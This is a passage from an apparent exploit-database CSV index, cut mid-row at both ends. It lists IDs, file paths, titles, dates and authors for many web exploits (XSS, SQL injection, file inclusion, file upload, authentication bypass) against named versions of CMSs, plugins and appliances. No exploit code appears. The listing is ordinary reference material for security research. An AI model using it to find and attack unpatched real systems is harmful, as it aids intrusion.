PRO 1.5 - Persistent Cross-Site Scripting",2014-12-31,"Halil Dalabasmaz",webapps,php,80 +35645,exploits/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Cross-Site Scripting",2011-04-20,Kurd-Team,webapps,php, +35647,exploits/php/webapps/35647.txt,"SyCtel Design - 'menu' Multiple Local File Inclusions",2011-04-21,"Ashiyane Digital Security Team",webapps,php, +35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php, +35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php, +35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php, +35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php, +35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php, +35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php, +35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php, +35664,exploits/php/webapps/35664.txt,"phpList 2.10.x - 'email' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",webapps,php, +35658,exploits/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Cross-Site Scripting",2011-04-26,KedAns-Dz,webapps,php, +35663,exploits/php/webapps/35663.txt,"WordPress Plugin WP Ajax Recent Posts 1.0.1 - 'do' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",webapps,php, +35653,exploits/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,webapps,php, +35665,exploits/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",webapps,php, +35666,exploits/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,webapps,php, +35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php, +35668,exploits/php/webapps/35668.txt,"up.time Software 5 - Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",webapps,php, +35670,exploits/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",webapps,php,80 +35677,exploits/php/webapps/35677.txt,"eyeOS 1.9.0.2 - Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",webapps,php, +35678,exploits/php/webapps/35678.txt,"phpGraphy 0.9.13b - 'theme_dir' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",webapps,php, +35679,exploits/php/webapps/35679.txt,"e107 2 Bootstrap CMS - Cross-Site Scripting",2015-01-03,"Ahmet Agar / 0x97",webapps,php, +35680,exploits/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,webapps,php, +35682,exploits/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross-Site Scripting",2011-04-30,"AutoSec Tools",webapps,php, +35683,exploits/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",webapps,java, +35684,exploits/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 - 'selfserviceSaveOk' Cross-Site Scripting",2011-05-02,"AutoSec Tools",webapps,php, +35699,exploits/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php, +35700,exploits/php/webapps/35700.txt,"YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",webapps,php, +35697,exploits/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Cross-Site Scripting",2011-05-03,"AutoSec Tools",webapps,php, +35698,exploits/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",webapps,cgi, +35691,exploits/php/webapps/35691.txt,"Crea8Social 2.0 - Cross-Site Scripting Change Interface",2015-01-04,"Yudhistira B W",webapps,php, +35713,exploits/php/webapps/35713.txt,"FestOS 2.3c - 'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,webapps,php, +35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php, +35702,exploits/php/webapps/35702.txt,"GoT.MY (Multiple Products) - 'theme_dir' Cross-Site Scripting",2011-05-03,Hector.x90,webapps,php, +35704,exploits/php/webapps/35704.txt,"WordPress Plugin WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",webapps,php, +35705,exploits/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",webapps,php, +35706,exploits/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",webapps,jsp, +35707,exploits/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",webapps,jsp, +35708,exploits/php/webapps/35708.txt,"PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",webapps,php, +35709,exploits/php/webapps/35709.txt,"e107 0.7.25 - 'news.php' SQL Injection",2011-05-07,KedAns-Dz,webapps,php, +35710,exploits/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,webapps,php,80 +35715,exploits/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",webapps,php, +35716,exploits/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",webapps,php, +35717,exploits/php/webapps/35717.txt,"Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",webapps,php, +35718,exploits/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",webapps,php, +35719,exploits/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",webapps,php, +35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",webapps,php,80 +35721,exploits/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",webapps,hardware,80 +35722,exploits/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",webapps,php,80 +35723,exploits/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",webapps,php, +35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php, +35726,exploits/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php, +35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php, +35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp, +35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80 +35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80 +35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php, +35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php, +35737,exploits/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections",2011-05-10,"High-Tech Bridge SA",webapps,php, +35739,exploits/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",webapps,php, +35743,exploits/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,webapps,multiple, +35745,exploits/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' SQL Injection",2011-05-16,KedAns-Dz,webapps,php, +35747,exploits/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",webapps,hardware, +35758,exploits/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",webapps,asp, +35750,exploits/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd",2015-01-11,"XLabs Security",webapps,hardware, +35751,exploits/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting",2015-01-11,"XLabs Security",webapps,hardware, +35752,exploits/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,webapps,php, +35754,exploits/php/webapps/35754.txt,"allocPSA 1.7.4 - '/login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",webapps,php, +35755,exploits/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",webapps,php, +35756,exploits/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Cross-Site Scripting",2011-05-16,"AutoSec Tools",webapps,php, +35757,exploits/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",webapps,php, +35759,exploits/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting",2011-05-16,"John Leitch",webapps,php, +35760,exploits/php/webapps/35760.txt,"PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",webapps,php, +35761,exploits/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Cross-Site Scripting",2011-05-18,"Mesut Timur",webapps,php, +35767,exploits/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,webapps,php,80 +35998,exploits/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' SQL Injection",2011-07-25,Ehsan_Hp200,webapps,php, +35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80 +35770,exploits/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",webapps,hardware,623 +35775,exploits/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,webapps,ios,8888 +35781,exploits/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",webapps,java, +35782,exploits/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",webapps,php, +35783,exploits/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution",2011-05-19,"AutoSec Tools",webapps,php, +35787,exploits/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",webapps,php, +35788,exploits/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' SQL Injection",2011-05-23,FL0RiX,webapps,php, +35789,exploits/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",webapps,php, +35791,exploits/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",webapps,php, +35803,exploits/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,webapps,php, +35796,exploits/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,webapps,php, +35797,exploits/php/webapps/35797.txt,"Joomla! Component com_shop - SQL Injection",2011-05-25,"ThunDEr HeaD",webapps,php, +35798,exploits/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Cross-Site Scripting",2011-05-25,"AutoSec Tools",webapps,php, +35802,exploits/cgi/webapps/35802.txt,"BlackBoard Learn 8.0 - 'keywordraw' Cross-Site Scripting",2011-05-25,"Matt Jezorek",webapps,cgi, +35807,exploits/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Cross-Site Scripting",2011-05-31,LiquidWorm,webapps,asp, +35808,exploits/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",webapps,php, +35814,exploits/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,webapps,php, +35815,exploits/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,webapps,php, +35816,exploits/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections",2011-06-01,"High-Tech Bridge SA",webapps,php, +35819,exploits/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' SQL Injection",2011-06-02,"Gjoko Krstic",webapps,php, +35823,exploits/php/webapps/35823.txt,"WordPress Plugin Pie Register 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",webapps,php,80 +35824,exploits/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Cross-Site Scripting",2011-06-06,Mr.ThieF,webapps,php, +35985,exploits/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'report_marketing.php?exc[]' SQL Injection",2011-07-26,"Yuri Goltsev",webapps,php, +35986,exploits/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'billable_incidents.php?sites[]' SQL Injection",2011-07-26,"Yuri Goltsev",webapps,php, +35984,exploits/php/webapps/35984.txt,"Joomla! Component com_virtualmoney 1.5 - SQL Injection",2011-07-25,FL0RiX,webapps,php, +35826,exploits/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,webapps,php, +35829,exploits/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Cross-Site Scripting",2011-06-06,"AutoSec Tools",webapps,php, +35830,exploits/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,webapps,php, +35831,exploits/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,webapps,php, +35832,exploits/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",webapps,php, +35833,exploits/php/webapps/35833.txt,"Xataface 1.x - 'action' Local File Inclusion",2011-06-07,ITSecTeam,webapps,php, +35834,exploits/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",webapps,php, +35835,exploits/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' SQL Injection",2011-06-08,anonymous,webapps,php, +35837,exploits/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Cross-Site Scripting",2011-06-07,LiquidWorm,webapps,php, +35838,exploits/php/webapps/35838.txt,"Tolinet Agencia - 'id' SQL Injection",2011-06-10,"Andrea Bocchetti",webapps,php, +35839,exploits/php/webapps/35839.txt,"Joomla! Component Minitek FAQ Book 1.3 - 'id' SQL Injection",2011-06-13,kaMtiEz,webapps,php, +35840,exploits/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",webapps,php,80 +35996,exploits/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,webapps,php, +35846,exploits/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",webapps,php,80 +35851,exploits/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,webapps,php, +35852,exploits/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",webapps,asp, +35853,exploits/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,webapps,php, +35854,exploits/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,webapps,php, +35857,exploits/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection",2015-01-21,TranDinhTien,webapps,php, +35858,exploits/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,webapps,php, +35860,exploits/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,webapps,php,80 +35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php, +35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php, +35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php, +35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php, +35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php, +35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php, +35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php, +35872,exploits/asp/webapps/35872.txt,"H3C ER5100 - Authentication Bypass",2011-06-22,128bit,webapps,asp, +35874,exploits/php/webapps/35874.txt,"Eshop Manager - Multiple SQL Injections",2011-06-22,"Number 7",webapps,php, +35875,exploits/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",webapps,php, +35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php, +35878,exploits/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",webapps,php, +35879,exploits/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,webapps,php, +35882,exploits/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' SQL Injection",2011-06-23,"Andrea Bocchetti",webapps,php, +35883,exploits/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' SQL Injection",2011-06-27,Th3.xin0x,webapps,php, +35884,exploits/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",webapps,php, +35890,exploits/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",webapps,jsp, +35891,exploits/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",webapps,jsp,8080 +35893,exploits/php/webapps/35893.txt,"WordPress Plugin Pretty Link Lite 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,webapps,php, +35894,exploits/php/webapps/35894.txt,"Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",webapps,php, +35896,exploits/php/webapps/35896.txt,"Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",webapps,php, +35899,exploits/php/webapps/35899.txt,"Mangallam CMS - SQL Injection",2015-01-26,Vulnerability-Lab,webapps,php, +35900,exploits/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass",2015-01-26,Vulnerability-Lab,webapps,cgi, +35980,exploits/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery",2015-02-03,"Mohamed Idris",webapps,multiple,8020 +35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",webapps,jsp, +35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",webapps,php, +35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple, +35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",webapps,jsp, +35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple, +36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",webapps,php, +35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",webapps,windows,8080 +35988,exploits/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'tasks.php?selected[]' SQL Injection",2011-07-26,"Yuri Goltsev",webapps,php, +35989,exploits/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",webapps,php, +35990,exploits/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",webapps,php, +35991,exploits/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",webapps,php,80 +35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",webapps,php,80 +35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple, +35916,exploits/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",webapps,php,80 +35922,exploits/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Local File Inclusion",2011-07-05,FL0RiX,webapps,php, +35923,exploits/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injections",2011-07-02,Net.Edit0r,webapps,asp, +35926,exploits/asp/webapps/35926.txt,"eTAWASOL - 'id' SQL Injection",2011-07-03,Bl4ck.Viper,webapps,asp, +35927,exploits/php/webapps/35927.txt,"Classified Script - c-BrowseClassified Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",webapps,php, +35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,webapps,php, +35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,webapps,php, +35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,webapps,php, +35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",webapps,hardware, +35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",webapps,php, +35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",webapps,multiple, +35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",webapps,php, +35943,exploits/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,webapps,php, +35944,exploits/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,webapps,php, +35945,exploits/php/webapps/35945.txt,"Chyrp 2.x - 'action' Traversal Local File Inclusion",2011-07-29,Wireghoul,webapps,php, +35946,exploits/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php?File' Traversal Arbitrary File Access",2011-07-29,Wireghoul,webapps,php, +35947,exploits/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension - 'upload_handler.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,webapps,php, +35950,exploits/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",webapps,php,80 +35954,exploits/php/webapps/35954.txt,"Auto Web Toolbox - 'id' SQL Injection",2011-07-15,Lazmania61,webapps,php, +35955,exploits/php/webapps/35955.txt,"Easy Estate Rental - 's_location' SQL Injection",2011-07-15,Lazmania61,webapps,php, +35956,exploits/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' SQL Injection",2011-07-15,SOLVER,webapps,php, +35958,exploits/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' SQL Injection",2011-07-15,SOLVER,webapps,php, +35959,exploits/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,webapps,php, +35960,exploits/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' SQL Injection",2011-07-15,SOLVER,webapps,php, +35987,exploits/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'search.php?search_string' SQL Injection",2011-07-26,"Yuri Goltsev",webapps,php, +35966,exploits/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",webapps,php, +35967,exploits/php/webapps/35967.txt,"AJ Classifieds - 'listingid' SQL Injection",2011-07-15,Lazmania61,webapps,php, +35968,exploits/php/webapps/35968.txt,"BlueSoft (Multiple Products) - Multiple SQL Injections",2011-07-18,Lazmania61,webapps,php, +35969,exploits/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,webapps,php, +35971,exploits/php/webapps/35971.txt,"WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,webapps,php, +35972,exploits/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injections",2015-02-02,"ITAS Team",webapps,php, +35973,exploits/php/webapps/35973.txt,"Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",webapps,php, +35974,exploits/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",webapps,php, +35975,exploits/php/webapps/35975.txt,"Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",webapps,php, +35976,exploits/php/webapps/35976.txt,"Synergy Software - 'id' SQL Injection",2011-07-21,Ehsan_Hp200,webapps,php, +35977,exploits/php/webapps/35977.txt,"Godly Forums - 'id' SQL Injection",2011-07-25,3spi0n,webapps,php, +35978,exploits/php/webapps/35978.txt,"Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",webapps,php, +35979,exploits/php/webapps/35979.txt,"Willscript Recipes Website 